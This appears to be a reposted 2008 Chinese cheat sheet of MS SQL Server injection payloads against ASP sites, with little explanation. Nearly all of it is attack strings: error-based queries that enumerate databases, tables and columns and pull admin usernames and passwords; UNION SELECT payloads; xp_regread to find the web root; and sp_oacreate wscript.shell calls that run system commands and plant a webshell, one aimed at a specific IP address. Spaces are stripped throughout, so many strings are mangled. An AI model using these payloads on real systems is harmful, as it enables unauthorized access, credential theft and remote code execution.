非常经典的Ms Sql注射资料

　2008-10-04 11:10:32　来源：WEB开发网　　　

核心提示： 访问属性：（配合写入一个webshell）declare@ointexecsp_oacreate'wscript.shell',@ooutexecsp_oamethod@o,'run',NULL,'cscript.exec：inetpubwwwroo

访问属性：（配合写入一个webshell）

declare@ointexecsp_oacreate'wscript.shell',@ooutexecsp_oamethod@o,'run',NULL,'cscript.exec：inetpubwwwrootchaccess.vbs-aw3svc/1/ROOT/e+browse'

and0<>(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)

依次提交dbid=7,8,9....得到更多的数据库名

and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype='U')暴到一个表假设为admin

and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype='U'andnamenotin('Admin'))来得到其他的表。

and0<>(selectcount(*)frombbs.dbo.sysobjectswherextype='U'andname='admin'

anduid>(str(id)))暴到UID的数值假设为18779569uid=id

and0<>(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569)得到一个admin的一个字段,假设为user_id

and0<>(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569andnamenotin

('id',...))来暴出其他的字段

and0<(selectuser_idfromBBS.dbo.adminwhereusername>1)可以得到用户名

依次可以得到密码。。。。。假设存在user_idusername,password等字段

Show.asp?id=-1unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,*fromadmin

Show.asp?id=-1unionselect1,2,3,4,5,6,7,8,*,9,10,11,12,13fromadmin

(union语句到处风靡啊，access也好用

暴库特殊技巧：:%5c=''或者把/和修改%5提交

and0<>(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6) and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype='U')得到表名 and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype='U'andnamenotin('Address')) and0<>(selectcount(*)frombbs.dbo.sysobjectswherextype='U'andname='admin'anduid>(str(id)))判断id值 and0<>(selecttop1namefromBBS.dbo.syscolumnswhereid=773577794)所有字段 http://xx.xx.xx.xx/111.asp?id=3400;createtable[dbo].[swap]([swappass][char](255));-- http://xx.xx.xx.xx/111.asp?id=3400and(selecttop1swappassfromswap)=1 ;createTABLEnewtable(idintIDENTITY(1,1),pathsvarchar(500))Declare@testvarchar(20)execmaster..xp_regread@rootkey='HKEY_LOCAL_MACHINE',@key='SYSTEMCurrentControlSetServicesW3SVCParametersVirtualRoots',@value_name='/',values=@testOUTPUTinsertintopaths(path)values(@test) http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--